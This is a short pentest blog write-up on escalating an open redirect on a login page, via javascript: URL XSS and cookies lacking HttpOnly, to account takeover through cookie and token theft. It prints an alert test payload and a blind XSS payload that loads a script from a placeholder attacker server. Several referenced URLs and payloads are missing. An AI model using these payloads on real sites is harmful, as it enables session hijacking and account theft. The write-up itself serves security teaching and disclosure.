How Can Open Redirect Lead to Account takeover



During a pentesting engagement at CyberAR, I discovered an open redirect vulnerability on the login page that I was able to escalate to an account takeover. In this write-up, I’ll explain how I achieved this.

Exploit Begins – OpenRedirect to Account Takeover

While exploring the website, I noticed a redirect parameter on the login page. I will also explain how to quickly identify open redirect vulnerabilities in the tips below, For example, the URL looked like this: I tested this parameter for open redirect and successfully redirected to an attacker page. However, I needed to escalate this further, so I tested the redirect for XSS (Cross-Site Scripting) by injecting the following payload: Javascript:alert(1). After entering credentials and clicking on sign-in, the XSS payload was executed.


Next, I opened the browser developer tools and checked the storage tab for the HTTP-only flag, which prevents JavaScript from accessing cookies. I observed that all parameters had the HTTP-only flag set to false.


I then attempted to inject the following blind XSS payload:

 javascript:eval('var a=document.createElement(\\'script\\');a.src=\\'https://<YOUR-SERVER>\\';document.body.appendChild(a)')

and monitored the network tab. Unfortunately, I noticed that requests with the server name containing the blind XSS payload did not appear in the network requests. After trying another blind XSS payload,


I observed that the request containing my server name appeared in the network tab


and successfully received a callback on my server.

and With this crafted URL


I was able to send it to the victim and steal the cookies and token, which allowed me to successfully log into the account.



In this write-up, I detailed how an open redirect vulnerability on a login page was leveraged to achieve an account takeover by combining it with XSS and cookie theft techniques. I also provided tips for identifying and exploiting similar vulnerabilities.

Thanks for reading.


Don’t Forget to check this Also: Penetration Testing Writeup